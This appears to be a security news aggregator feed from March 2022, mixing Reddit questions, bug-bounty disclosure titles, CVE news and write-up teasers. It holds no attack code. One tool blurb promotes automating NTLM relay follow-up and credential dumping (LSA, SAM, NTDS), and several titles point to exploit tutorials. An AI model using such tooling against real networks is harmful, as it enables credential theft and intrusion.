    OpenSSL resources?
    How do you get started on OpenSSL? I'm currently doing some CTFs and I encounter some OpenSSL questions; I don't have any idea how to study this one (done with searching on YouTube). Thank you submitted by /u/pldc_bulok [link] [comments]
    Building a security program at a startup?
    I'm a mid-level software engineer with some security experience interviewing with early stage startups for application security engineering positions. Many of these companies are either building a security team from scratch, or have 1-2 security engineers already. I'll primarily be working with developers on doing source code reviews, tool development and automation. I'm assuming there won't be much real mentorship/guidance, so I'd like to know what are some of the first things a new security engineer at an early stage startup should do to hit the ground running. submitted by /u/cppnewb [link] [comments]
    Bachelor Thesis Topic Ideas
    Hello everyone, I'm doing my bachelor's in computer science and I'll be writing my bachelor's thesis. Actually, my professor offered a thesis topic related to the implementation of access control with certificates on a VPN. It's nice but requires me to be at the university, and unfortunately I can't be in the same city in the next semester. So I'm looking for more research-oriented topics related to security, preferably on the defensive side. I'd appreciate it if anyone could suggest some topics, so I can talk to my prof in the next meeting with different ideas. Thank you in advance. submitted by /u/guneysss [link] [comments]
    Good Security dashboard Template
    Hi Security Folks, What are the security metrics you are collecting and reporting every week? Is there a good security dashboard template that I can use for my team/upper c-level manager report? submitted by /u/Calm_Scene [link] [comments]
  • Open

    LOLBINed — F-Secure Support Tool (FSDIAG)
    Continue reading on Medium »
    WHAT ARE WIRELESS NETWORK PENETRATION TECHNIQUES AND HOW IS WIRELESS NETWORK SECURITY ENSURED?
    Wi-Fi, which holds the most important share among wireless communication technologies, operates through the use of radio waves over certain distances… Continue reading on Medium »
  • Open

    Ukraine — Situation update as of 18 March
    The last 24 hours Continue reading on Medium »
  • Open

    Analyzing Malware with Hooks, Stomps, and Return-addresses
    submitted by /u/dmchell [link] [comments]
  • Open

    CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable
    CVE-2021-28372, a vulnerability in third-party software commonly built into many IP cameras, highlights issues in IoT supply chain security. The post CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable appeared first on Unit42.
  • Open

    Escaping Dirty Pipe (a.k.a. CVE-2022-0847), mostly unscathed
    Article URL: https://blog.replit.com/dirtypipe-kernel-vulnerability Comments URL: https://news.ycombinator.com/item?id=30714414 Points: 1 # Comments: 0
    CVE-2022-23812: node-ipc contains malicious code targeting Russia and Belarus
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-23812 Comments URL: https://news.ycombinator.com/item?id=30707728 Points: 39 # Comments: 2
  • Open

    Indirect Command Execution: Defense Evasion (T1202)
    Introduction Indirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense The post Indirect Command Execution: Defense Evasion (T1202) appeared first on Hacking Articles.
  • Open

    IDOR at https://demo.sftool.gov/TwsHome/ScorecardManage/ via scorecard name
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1472721
    Use of uninitialized value of in req_parsebody method of lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1514863 - Bounty: $2400
    Theft of protected files on Android
    ownCloud disclosed a bug submitted by n00b-cyborg: https://hackerone.com/reports/1454002 - Bounty: $50
    Instance Page DOS within Organization on TikTok Ads
    TikTok disclosed a bug submitted by arsene_lupin: https://hackerone.com/reports/1478930 - Bounty: $200
  • Open

    How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public…
    No content preview
    How contact forms can be exploited to conduct large-scale phishing activity?
    No content preview
    Securing your Linux Servers Part 3
    No content preview
    Synkcon CTF 2021 not-hot-dog Writeup
    No content preview
    Simple Recon Methodology
    No content preview
    TryHackMe: Basic Pentesting
    No content preview
    TryHackMe: RootMe
    No content preview
    TryHackMe: Blue
    No content preview
    TryHackMe: RES
    No content preview
  • Open

    SecWiki News 2022-03-17 Review
    A Comprehensive Study of Stateless Scanning in the Wild by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Unable to run Plaso Autopsy ingest module on Windows 10. Anyone know a workaround?
    I’m running Autopsy 4.19.3 on Windows 10 and I’m unable to run the plaso module against any data source. The logs show this error: SEVERE: Plaso experienced an error during analysis (data source = Y247388.E01, objId = 1, pipeline id = 3, ingest job id = 2) java.nio.file.InvalidPathException: Illegal char at index 92: C:\Users\forensics\Documents\Cases\Y247388-New\ModuleOutput\plaso\2022-03-16 15-15-11 GMT-07:00 It looks like the plaso module is trying to create a file or folder with a colon in it from the timezone information. Is there any way to get around this? submitted by /u/thenebular [link] [comments]
    An employee downloaded a virus to a computer.
    What are the chances it was able to access the entire server? I have a team working on it but I'm waiting and wondering. submitted by /u/Otherwise-Special-95 [link] [comments]
  • Open

    Bypassing Stack Canaries and NX/DEP (Ret2Lib-C) - Bird - [Intigriti 1337UP LIVE CTF 2022]
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    American NGO affected by your recklessness (node-ipc vulnerability)
    Article URL: https://github.com/RIAEvangelist/node-ipc/issues/308 Comments URL: https://news.ycombinator.com/item?id=30711545 Points: 25 # Comments: 13
  • Open

    X is a New Horror Cult Classic
    BOOGIE NIGHTS meets THE TEXAS CHAINSAW MASSACRE in Ti West’s latest Continue reading on Cinapse »
  • Open

    Parameter Pollution - Zero Day
    Summary : Continue reading on Medium »
    Cansina — Open Source Hidden Content Discovery Tool on Linux
    Reconnaissance is one of the first steps to conduct within a pen test engagement. During this stage, information is gathered using… Continue reading on Medium »
    My First Blind SQL Injection
    Hello Hackers and security community.. Continue reading on Medium »
    Sensitive Information disclosure through unrestricted Directories
    Hello Hackers and Security community.. Continue reading on Medium »
    Google Dorks and a SQL Dump
    A odd Google Dorking method I used to successfully find a sql dump. Continue reading on Medium »
    The 13 Best Vulnerable Web Applications & Vulnerable Websites for Testing
    This list contains a variety of vulnerable websites, vulnerable web apps, battlegrounds and wargames communities. Continue reading on Medium »
  • Open

    FreeBuf Morning Report | China's cybersecurity market will exceed US$21.4 billion by 2025; Ukrainian security agency arrests hacker supporting Russian forces
    The Security Service of Ukraine (SSU) claims to have detained a hacker who provided technical support to Russian forces.
    Unpatched RCE vulnerability in dompdf affects the HTML-to-PDF converter
    Researchers have found an unpatched security vulnerability in "dompdf" which, if successfully exploited, could lead to remote code execution in certain configurations.
    Hundreds of websites hosted by GoDaddy had backdoors deployed within a short period
    A large number of backdoors were deployed on some WordPress sites hosted on GoDaddy's managed servers.
    New "B1txor20" Linux botnet is spreading by exploiting the Log4J vulnerability
    This new B1txor20 malware can enlist target devices into a botnet and serve as a channel for downloading and installing rootkits.
    Facebook removed a fabricated fake video of Ukrainian President Zelensky
    Facebook recently removed a fake video circulating on the social network in which Ukrainian President Zelensky asks Ukrainian troops to lay down their weapons and surrender.
  • Open

    Diagrams and instructions for toilets.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Learning V8 Exploitation from Scratch: CVE-2021-21220 (Part 8)
    Author: Hcamael@知道创宇404实验室 Date: 21 February 2022 The sixth one studied is CVE-2021-21220, whose Chrome bug number is 1196683. Its related information is easy to find: the highest affected Chrome version is 89.0.4389.114, the highest affected V8 version is 8.9.255.24, and an exp is also attached. Setting up the environment: compile the related environment with one command: $ ./build.sh 8.9.255.24...

  • Open

    TOOL: ntlmrelayx2proxychains combining/automating ntlmrelayx, crackmapexec, and proxychains!
    submitted by /u/BugbearB [link] [comments]
    NPM supply chain attack: node-ipc and peacenotwar sabotaged as an act of protest by the maintainer
    submitted by /u/tubularobot [link] [comments]
    Cool Open Source Security Tools & Programs list
    submitted by /u/Khaotic_Kernel [link] [comments]
    Git honours embedded bare repos - justinsteven
    submitted by /u/Gallus [link] [comments]
    Call for participants in Rizin/Cutter's Google Summer of Code 2022
    submitted by /u/XVilka [link] [comments]
    Arya - new tool to generate pseudo malware samples based on YARA rules
    submitted by /u/n0llbyte [link] [comments]
    cr8escape: New Vulnerability in CRI-O allows for container breakout
    submitted by /u/raesene2 [link] [comments]
    Top 10 CI/CD Security Risks
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    HermeticWiper Technical Analysis Report
    submitted by /u/mstfknn [link] [comments]
    ThreatMapper 1.3.0 update - +runtime SBOM, +secret scanning, +attack path
    submitted by /u/foobarbazwibble [link] [comments]
    From XSS to RCE (dompdf 0day)
    submitted by /u/mckirk_ [link] [comments]
    Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582) - Whilst analysing the patch for CVE-2021-30833, an additional vulnerability was identified which could allow for arbitrary file-write when unpacking a malicious XAR archive using the xar utility.
    submitted by /u/digicat [link] [comments]
    7 RCE and DoS vulnerabilities Found in ClickHouse DBMS
    submitted by /u/SRMish3 [link] [comments]
    CVE-2022-25636 : New Linux Bug in Netfilter Firewall Module Lets Attackers Gain Root Access
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    TOOL: ntlmrelayx2proxychains
    ntlmrelayx2proxychains aims to connect the tool of SecureAuthCorp's impacket suite, ntlmrelayx.py (hereafter referred to as "ntlmrelayx"), along with @byt3bl33d3r's tool, CrackMapExec (hereafter referred to as "CME"), over proxychains, developed by haad. Currently, when having active relays via ntlmrelayx.py, you need to manually provide user, domain, and IP address in CME over proxychains. The idea behind this tool is to automate this process. So have you ever felt too lazy to explore all shares, logged-in users, sessions, disks, and/or password policy manually after using ntlmrelayx, or felt too lazy to dump the lsa, sam, and/or ntds on all systems where you found a local administrator? If so, you'll for sure enjoy ntlmrelayx2proxychains! :) Link: https://github.com/He-No/ntlmrelayx2proxychains submitted by /u/BugbearB [link] [comments]
    Have Your Cake and Eat it Too? An Overview of UNC2891
    submitted by /u/dmchell [link] [comments]
  • Open

    Can you be Hacked by Visiting a Website?
    Visiting websites throughout the decades has always had its risks. With the creation of Flash Player and JavaScript, site visitors could potentially be impacted by malicious viruses, like the notorious YouAreAnIdiot[.]org pop-ups that caused computers to be overrun by a massive amount of pop-ups until the computer rebooted. Unfortunately, infections can, and likely always will, exist when accessing infected sites. In this article, we’ll discuss the kinds of hacked sites that are still out there and how to avoid them. Continue reading Can you be Hacked by Visiting a Website? at Sucuri Blog.
  • Open

    Basic Pentesting — Process Report
    Step 1: We begin Enumeration. Continue reading on Medium »
  • Open

    X-XSS-Protection headers. Protection or vulnerability?
    What is it? Continue reading on Medium »
    Nmap Cheat Sheet
    Full nmap cheat sheet with example. Continue reading on Medium »
    The 7 Penetration Testing Steps & Phases: a Checklist
    7 Steps and Phases of Penetration Testing Continue reading on Medium »
    Optimism Infinite Money Duplication Bugfix Review
    Summary Continue reading on Immunefi »
    Hats Finance Opens New Bug Bounty Program with Fuji DAO
    About Fuji DAO Continue reading on Medium »
    How I was able to find 50+ Cross site scripting(XSS) Security Vulnerabilities on Bugcrowd Public…
    Hello everyone, I hope by the grace of God everyone who is reading this blog post is doing well and their families during this pandemic… Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 1
    Hello Members, I hope that you liked the previous article that is File-Inclusion. Therefore, I worked hard to complete Penetration-list… Continue reading on Medium »
    How I “HACKED” my college site
    Hello readers , I am Aditya , a second year student at Madhav institute of Technology and Science , Gwalior . This is a story of how I… Continue reading on Medium »
    KitHack — Hacking tools pack in Kali Linux
    KitHack Framework is a free and open-source tool available on GitHub. It is designed to automate the process of downloading and installing… Continue reading on Medium »
  • Open

    Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect
    The Malleable C2 profile helps make Cobalt Strike an effective emulator for which it is difficult to design traditional firewall defenses. The post Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect appeared first on Unit42.
  • Open

    Just wondering
    Can a phone be hacked? To where you can see my phone calls, text messages, browser history, and location. If so how can I protect my info? submitted by /u/Valuable-Green-8890 [link] [comments]
    What's the correct term for a SaaS provider who uses another Cloud service for their underlying platform?
    I've been wrestling with finding the correct term for a breed of SaaS provider, and I'm hoping that such a thing exists. I'm talking about the SaaS products that use Azure, AWS or Google on the backend for the platform, but construct their own applications for resale. I want to call them middleware, but I know that is not correct. The reason I'm asking is I get A LOT of proposers who make no comments about their own cybersecurity posture, and keep deferring to whatever security is provided by the underlying platform. Thoughts? submitted by /u/paulexander [link] [comments]
    Safe to explore evtx / hives from a compromised machine?
    Hi, one of my friends has been hit by some ransomware, and he just asked me for some help to reinstall the OS (Win10). I'm wondering whether this could be a nice chance to investigate (for fun) Windows logs and/or the system registry with some tools like Registry Explorer. Can I do this on my day-to-day machine? Is there any risk of getting infected? Sorry for my probably silly question submitted by /u/g-simon [link] [comments]
    Any good communities or forums for learning assembly language or reverse engineering at all?
    Looking for some communities and forums which can help me to learn more about assembly language and reverse engineering. Anyone have any suggestions or resources? submitted by /u/SufficientDistrict10 [link] [comments]
    functional vs non-functional security requirements
    I have been asked to create functional and non-functional requirements for the products we will acquire from various different vendors. I work in the security architecture department. For non-functional they are going to be pretty much generic and I see significant resources on the internet, but can someone provide some pointers which will help me make a functional requirements document for security architecture? submitted by /u/anjan42 [link] [comments]
    Pentest Burnout - Looking for advice on next steps
    Bit of a different post here than usual. I've been a pentester for 3 years now with the same company. Management is poor and there are many hours spent off the clock being used to catch up on writing reports that couldn't be done in time due to overlapping client work. We are busy (which is "a good thing" as they say), but our team has been grinding pretty much non stop for 2 years. High utilization rates (usually pushing 100%) keep us all booked with little to no wiggle room to pursue career development related items like new certs/training unless it's done on what's left of our free time. I likely should've left earlier, but I needed the job for stability. I feel more stable financially but not mentally, so I think it may be time to move on. It's hard to decide if I'm just burned out from pentesting as a whole or if I would thrive in a better managed environment. Either way, I'm leaning towards internal blue team related jobs as it seems to be the best way to transition my skills. My biggest struggle is dealing with too many clients in a short timespan, and having work follow me after hours. I don't know what job in this line of work can eliminate those two things, but I am on the hunt and would love suggestions! TLDR: What are jobs that pentesters can transition into after getting burnt out? I am thinking about internal blue team related positions, but open to any other suggestions. Please feel free to share any similar experiences as well. submitted by /u/UniversitySquirrel [link] [comments]
    Approach to selecting a new pen test vendor. What should I look for/ask?
    Hi all, I work for a financial company that has about 400 employees. I am not an expert on net sec but know some basics. I have been with the company for about two years and am somewhat familiar with our environment. My boss asked me to look into a new pen test vendor and since I have no experience with this sort of thing I was wondering how I should be approaching this. Seems like the last guy who did this is no longer around for guidance. Any help is appreciated. Thank you submitted by /u/Throwawayboi91 [link] [comments]
    web hacking automation
    I have a Dev background and I'm quite familiar with web hacking. Seeing these top hackers automating a ton, one question arises in my mind: "What bugs are practically automatable?" Everyone is automating subdomain takeovers, it's easy to automate, but what about XSS or SQLi? Are they automating those only by checking URL parameters? submitted by /u/crusader2409 [link] [comments]
    How safe is js source obfuscation?
    I don't have much background in security. I am planning to make a small game for an event. Imagine something like Flappy Bird, except that you will get a real prize in the form of a gift card after finishing the game. To prevent players from cheating, I will obfuscate the JS source, but how safe is this approach? Is it easy to bypass? And how much will JS obfuscation impact performance? submitted by /u/Chillseashells [link] [comments]
    Active Directory protocols
    Hi! I am reading on AD network security. Currently, I find only network-related security issues regarding NTLM and Kerberos. Are there not other protocols and correlating attacks that are out there? I would love references to papers or blogs. submitted by /u/DiiBBz [link] [comments]
    Internal Websites / Web GUIs Best Practices
    I have taken over a 15 segment switch network that has been neglected in the use of best practices for many years. I have migrated from telnet to SSH, local logins to RADIUS, SNMPv3 and so on. The issue I am having is that my coworkers and I have a difference of opinion on certain things. The last issue I had was the best practices in regards to SNMPv3. https://www.reddit.com/r/AskNetsec/comments/taa6ny/snmpv3_password_best_practice/?utm_source=share&utm_medium=web2x&context=3 The advice I got here was helpful for us to come to an understanding on the proper course of action. I would like to ask for more help. We have several internal websites / web GUIs: Cisco Firepower, Cisco Prime, SolarWinds, Cisco Wireless controllers, etc. These sites are all internal with no public facing addresses and just private addressing 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16. I say that we should have a URL and install a web certificate in order to have HTTPS so the traffic is encrypted. I am getting push back from my coworkers that this is overkill since we don't allow access to these systems. I am thinking that this could be an attack vector since malicious software could be installed on our network collecting such information, and then when they have enough it's game over for us. Could anyone direct me to some good information on this topic or take a moment of their time to explain it here? - Thank you in advance submitted by /u/NetworkRex [link] [comments]
    Question about HaveIBeenPwned hash lists file size
    Hello, On the website I see two options to download, one of them is ordered by prevalence and one is ordered by hash. Any idea why the ordered by prevalence is much much larger? 17.2 GB vs 11.1 GB https://haveibeenpwned.com/Passwords submitted by /u/itismo [link] [comments]
    Port forwarding VPN server dangerous?
    I want to host my own VPN server. The server in question is pretty discardable, a.k.a. if it breaks, I don't really care, so I am planning to port forward it to the internet. The question is: is port forwarding SoftEther VPN safe or not? It certainly depends on the port that is open, but in general, how well do VPN servers like SoftEther hold up against worms and trojans and mass malware? Will it spread to my other devices (which are more valuable than the server)? Is there such a thing as network-level port-forwarding malware? I literally tested port forwarding for a minute on a VM device and I got logs from all over the world with 100s of different IPs. It is a scary place out there and I want to make sure the port of entry is hardened and secure against these "meteors". submitted by /u/bootsareme [link] [comments]
    Question about Sensitive PII and Non-Sensitive PII
    Every day millions of websites capture information like Name, Address, and Email Addresses for registration on their websites. Is this information considered PII and are they legally obligated to treat it as such? For example, even Facebook captures my name and email address; would this be considered PII? Could someone explain where the line is essentially drawn between what is PII and what is not? Take a CMS like WordPress. WordPress has third-party tools like WooCommerce which capture Name, Physical Address, etc. So, because WooCommerce is capturing this data and it resides on the host installation of WordPress, is this considered PII? Which is the point of my question: would millions of websites be in violation and could potentially be sued? What would be considered 'reasonable protection'? -FC submitted by /u/FutureCombinations [link] [comments]
  • Open

    Sneaky F*ing Russians: Tracking Sanctioned Super-Yachts
    Last week, Benjamin Strick Tweeted a little piece of satellite imagery from Planet. The imagery was less than a day old, and showed what… Continue reading on Medium »
    Ukraine: Situation update as of 17 March
    The last 24 hours Continue reading on Medium »
    What is Open Source Intelligence (OSINT)?
    Open source intelligence is a term originally coined by intelligence services. OSINT uses freely available, open sources such as print… Continue reading on Medium »
    JupyterLab for Python
    Installation Continue reading on Medium »
  • Open

    windows stuff (+ spongebob favicon)
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Exploit Development: Browser Exploitation on Windows – CVE-2019-0567 (Part 1)
    Article URL: https://connormcgarr.github.io/type-confusion-part-1/ Comments URL: https://news.ycombinator.com/item?id=30702130 Points: 1 # Comments: 1
    Veeam Backup and Replication Distribution Service CVE-2022-26500, CVE-2022-26501
    Article URL: https://www.veeam.com/kb4288 Comments URL: https://news.ycombinator.com/item?id=30696265 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-03-16 Review
    [HTB] TheNotebook Writeup by 0x584a; ICD (Integrated Cyber Defense) concept reference model by ourren; Enterprise security operations practice: four stages to fast and accurate risk handling by ourren; for more of the latest articles, visit SecWiki
  • Open

    0-day Cross Origin Request Forgery vulnerability in Grafana 8.x .
    Aiven Ltd disclosed a bug submitted by abrahack: https://hackerone.com/reports/1458236 - Bounty: $1500
    Stored XSS through PDF viewer
    Slack disclosed a bug submitted by hitman_47: https://hackerone.com/reports/881557 - Bounty: $4875
    Open redirect GET-Based on https://www.flickr.com/browser/upgrade/?continue=
    Flickr disclosed a bug submitted by c4rrilat0rr: https://hackerone.com/reports/1217570 - Bounty: $150
  • Open

    [Autopsy] Sample images to learn / practice
    Hi, I am trying to learn autopsy and I am having hard time to find any disk images or data sources that I can use to practice and learn certain aspects/features of autopsy. Can anyone suggest somewhere I can download such samples with/without instructions? submitted by /u/madladmary [link] [comments]
    Lost Mode iPhone BFU?
    submitted by /u/investigator0101 [link] [comments]
    Exploring Career Transition Options
    I am currently exploring possible career options in the private sector and was hoping to get some input. The career I am interested in would be a remote position and hopefully near the six figure mark. For the past 8 years I have been in law enforcement as a forensic examiner for an ICAC task force. I have a BS in computer information systems and current certifications include A+, CFCE, ICMDE, CCME, and MCFE. I would like to continue doing something I find meaningful and am looking further into Threat Investigator positions for Meta, though I have yet to determine if this is a good fit. Does anyone have advice or opinions on what other positions may exist and what additional steps I may need to take to better prepare for such a future transition? submitted by /u/outdorksman [link] [comments]
  • Open

    HackTheBox — Devzat
    No content preview
    Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    No content preview
    How to write simple script to automate finding bugs
    No content preview
    OTP Bypass and Account Takeover at Rajagiri Hospital
    No content preview
    SQL Injection at Spotify
    No content preview
  • Open

    FBI warns that state-sponsored hackers are exploiting MFA flaws for lateral movement
    The US FBI says Russian government-backed hacking groups are actively exploiting misconfigured default multi-factor authentication (MFA) protocols to gain access to the cloud environments of some non-governmental organizations.
    FreeBuf Morning Report | US helps Ukraine strengthen its cyber warfare defenses; Germany advises citizens to uninstall Kaspersky antivirus
    Cybersecurity and digital security are the underlying logic that supports the digital economy; they cannot be built on infringing consumers' right to know and right to choose.
    Russia-Ukraine conflict puts critical information infrastructure at risk
    No content preview
    Investigation finds Google Play has recently been infiltrated by multiple malicious apps
    Security researchers tracking the mobile app ecosystem have noticed a recent surge in trojan infiltration of the Google Play store, with one app downloaded and installed more than 500,000 times.
    Germany's BSI advises replacing Kaspersky antivirus software
    BSI advises users to uninstall Kaspersky antivirus software, as it has found that the cybersecurity company may be linked to hacking attacks during Russia's ongoing invasion of Ukraine
    3·15 | Are smart speakers secure? The China evaluation is here to help!
    The China Software Testing Center selected several best-selling smart speakers, with and without screens, and evaluated them from multiple angles, including network security, data security and personal information security.
    Russia faces an IT crisis, with only two months of data storage capacity left
    After cloud service providers such as database giant Oracle and enterprise service provider SAP withdrew from Russia, Russia faces a severe IT storage crisis.
    3·15 gala sets up its first security lab to address information security: cybersecurity once again a "social topic"
    At the 2022 3·15 gala, cybersecurity issues remained a highlight; this year's gala set up an information security lab for the first time to demonstrate insecurity directly.
  • Open

    GitHub won’t restore HTTPie followers despite vulnerability, no notifications
    Article URL: https://twitter.com/httpie/status/1503862290822664198 Comments URL: https://news.ycombinator.com/item?id=30696255 Points: 7 # Comments: 1
  • Open

    Webinar on cyberattacks in Ukraine -- summary and Q&A
    Translator: Knownsec 404 Lab translation team. Original link: https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ About the webinar: On March 10, 2022, Kaspersky's Global Research and Analysis Team (GReAT) shared their insights on current (and past) cyberattacks in Ukraine. In this post, we address the questions we did not have time to answer and provide...

  • Open

    Bye👋🏼 XSS Auditor (X-XSS-Protection)
    This WebKit (Safari 15.4) update included an important security policy change: XSS Auditor, better known as X-XSS-Protection, is being removed. XSS Auditor is a design and security policy for mitigating reflected XSS; at the HTML parsing stage it checks how the web request is reflected in the response and blocks the page if XSS looks possible. Developers are given control over it through the X-XSS-Protection header in the response. It is being removed because WebKit's CSP (Content-Security-Policy) support has reached Level 3, so CSP is judged sufficient to cover this. Chrome dropped it in version 78 (around August 2019) and Firefox ended it long ago, so this feature and header are now unsupported in all three major browsers.
    The HAR (HTTP Archive format) format and future development plans
    Today, rather than something technical, I just want to talk about the HAR format, which I have recently become interested in. HAR: HAR (HTTP Archive format) is a JSON-based format created to log the interaction between a web browser and a website. It was made to export performance measurement information from browsers and web services, and is supported by major tools such as Chrome, Firefox and Postman. Charles Proxy Fiddler Firebug Firefox Google Chrome IE Microsoft Edge Postman OWASP ZAP Etc.. Why am I interested? HAR has been around for a long time, and I already knew about it since I had often seen it in the browser developer tools while doing analysis.
  • Open

    how do you train yourself?
    What are you doing about improving yourself/finding an entry-level job in cybersecurity? What is your routine about it? submitted by /u/ogunal00 [link] [comments]
    GDSA or CCNP Security
    Hey guys, So I do GRC as a living. I skipped from helpdesk into GRC consulting, but I'm interested in gaining technical knowledge in cybersecurity so that I could move to a security engineer/security analyst type role in the event I get tired of the work (which I can see happening atm). Something that should also be mentioned is that my job offers flexibility to be put on engagements that fit a topic you're interested in, though I have heard we don't have as many clients asking for help with implementation. I'm an associate of ISC(2) for the CISSP, have a couple comptia certs, the Azure Administrator, and the CCNA that I grabbed a couple years ago under the "new" exam structure. My company pays for certs, so price is not really an issue. I am interested in whether the GIAC GDSA or the CCNP Security is a more valuable investment. There's not too much information on the GDSA that I can find, and through my research, I have found people recommending to do the CCNP R&S before going to CCNP Security back when it was under a different format. I'm not interested in getting the CCNP Sec if it requires for me to get the CCNP Ent first. I don't really want to be a network engineer nor spend my time learning more advanced networking when I don't see myself using it. The curriculum in the CCNP Sec though seems more up my alley. Another option is to go for my CISM or CISA, but I don't want to focus more on the governance/management side of things when I severely lack practical implementation experience. It is another option on the table though. Thoughts? submitted by /u/DiscombobulatedEar88 [link] [comments]
    Nikto use vulnerabilities found!
    Hey guys, so I had this ASP.NET application I created for testing security (I am completely new to this field), so while looking for some tutorials I found this cool tool named Nikto which scans servers for vulnerabilities, and when I was running my ASP.NET app and testing it I got this line in the scan results saying: OSVDB-3092: /web.config: ASP config file is accessible. How can I access the web.config file that Nikto says is accessible? submitted by /u/darkuniv [link] [comments]
    Is there any way to currently circumvent China’s GFW?
    Was reading a couple articles written in last 12 months and I get the sense that most OpenVPN services are detected and blocked, as well as UDP (WireGuard). Is there any alternative that currently works besides direct satellite options? submitted by /u/DryBloomer [link] [comments]
  • Open

    OpenSSL CVE-2022-0778: Infinite loop in BN_mod_sqrt() reachable when parsing certificates
    submitted by /u/yawkat [link] [comments]
    NSA, CISA Release Updated Kubernetes Hardening Guidance
    submitted by /u/sanitybit [link] [comments]
  • Open

    Bounty Hacker Tryhackme
    No content preview
    How I bypassed disable_functions in php to get a remote shell
    No content preview
  • Open

    Coding C2 Bind Shell Channel with C# and Powershell
    https://www.youtube.com/watch?v=9CX7muqkjtQ submitted by /u/luzunov [link] [comments]
    Automating a Red Team Lab: Logging and Monitoring
    submitted by /u/nickonos [link] [comments]
  • Open

    International Women’s Day + Anti-War Protests + Ongoing “Freedom” convoys + More
    On this 4th edition of the discursus Protest Analytics newsletter — March 15, 2022 Continue reading on discursus.io »
    Don’t be a troll
    Around a year ago, I ended up in a Messenger conversation to assist a friend who had started a new business and had the surprise of… Continue reading on Medium »
  • Open

    SecWiki News 2022-03-15 Review
    No news updated yet today~ For more of the latest articles, visit SecWiki
  • Open

    Node.js security: Parse Server remote code execution vulnerability resolved
    Article URL: https://portswigger.net/daily-swig/node-js-security-parse-server-remote-code-execution-vulnerability-resolved Comments URL: https://news.ycombinator.com/item?id=30686373 Points: 1 # Comments: 0
  • Open

    Cr8escape: Zero-day in CRI-O Container Engine (CVE-2022-0811)
    Article URL: https://www.crowdstrike.com/blog/cr8escape-zero-day-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/ Comments URL: https://news.ycombinator.com/item?id=30686358 Points: 3 # Comments: 0
  • Open

    Mobile malware in Europe surges 500% since February
    Since February 2022, researchers have observed a 500% increase in mobile malware distribution in Europe.
    [Rootkit Research Series] Highly stealthy, highly persistent threats on the Linux platform
    Looking at the attack history of Western APT groups and the cyber weapons that have been leaked, high stealth and high persistence (Low & Slow) are their key characteristics, and rootkits are one of the important techniques for achieving this.
    Ukraine used Clearview AI's facial recognition technology in the conflict
    Recently, Ukraine's Ministry of Defense announced that it is deploying Clearview's AI facial recognition technology on the battlefield.
    Hackers breach the German subsidiary of a Russian energy giant, stealing 20TB of data
    The hackers say Russia's invasion of Ukraine was the root cause of the attack.
    Check your phone now: these 14 apps have been named by the MIIT
    The MIIT launched a "look back" campaign on apps infringing user rights, organizing third-party testing agencies to conduct targeted testing of apps, and found problems with 14 apps in total.
    FreeBuf Morning Report | Large-scale DDoS attack hits Israel; auto giant DENSO hit by ransomware attack
    Rumors that Ubisoft had suffered a cyberattack circulated online, and the data extortion group LAPSUS$ indicated that this is no rumor: they have breached Ubisoft.
    A full review of the Russia-Ukraine cyber war timeline and a study of its confrontation characteristics
    A full-scale military war broke out between Ukraine and Russia, and cyberspace has become a real battlefield.
    Israel hit by large-scale DDoS attack, taking its government websites offline
    According to Israeli media reports, a large-scale DDoS attack forced many Israeli government websites to shut down
  • Open

    How Chrome Became Highest Scoring Browser on Speedometer, Ever
    Last week we released a blog post about our improvements in Chrome speed over the past year culminating with the M99 release of Chrome. We wanted to follow up by going in depth on how we achieved this milestone in browser performance. Since the launch of Chrome in 2008, one of our core principles has been to build the fastest browser, whether you're on your phone or laptop. We have never strayed from our performance mission, and are always analyzing and optimizing every part of Chrome. We're proud to announce that Chrome scores over 300 on Apple’s Speedometer 2.0 benchmark suite on the M1 MacBook, the highest score we’ve ever seen. In this The Fast and the Curious post we'll go behind the scenes to share all the work that went into making Chrome blazingly fast. “If you can’t measure it y…
  • Open

    Los 3 Chiflados
    http://37.187.20.239/Los%203%20Chiflados/ submitted by /u/inoculatemedia [link] [comments]
    huge collection of flash games (nsfw) just in case
    submitted by /u/millhouse187 [link] [comments]
  • Open

    The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation
    submitted by /u/AttitudeAdjuster [link] [comments]
  • Open

    Research on exploiting a V8 vulnerability in WeChat for Windows
    Author: lxraa@识链实验室. Preface: Because the sandbox could not be bypassed, this vulnerability has been dismissed. Some time after Google fixes V8-related vulnerabilities, it publishes the PoC for the vulnerability on https://bugs.chromium.org/, and some vulnerabilities come with an exploit. But the published exploit usually targets the last vulnerable version; because the data structures of different V8 versions change, the heap layout differs, so the published exploit often cannot be used directly outside the lab environment. Using remote command execution in the latest version of WeChat as an example, this article introduces the process from exploit to real...
    New Russian wiper malware: a deep dive into the RURansom malware
    Translator: Knownsec 404 Lab translation team. Original link: https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ During routine OSINT research, Cyble Research Labs stumbled upon a Twitter post by the MalwareHunter team highlighting a piece named RU...
  • Open

    Bug Bounty on Marsbase
    Right after the release of the dOTC of the Marsbase platform, we are launching a Bug Bounty program to find bugs. This program provides… Continue reading on Medium »

  • Open
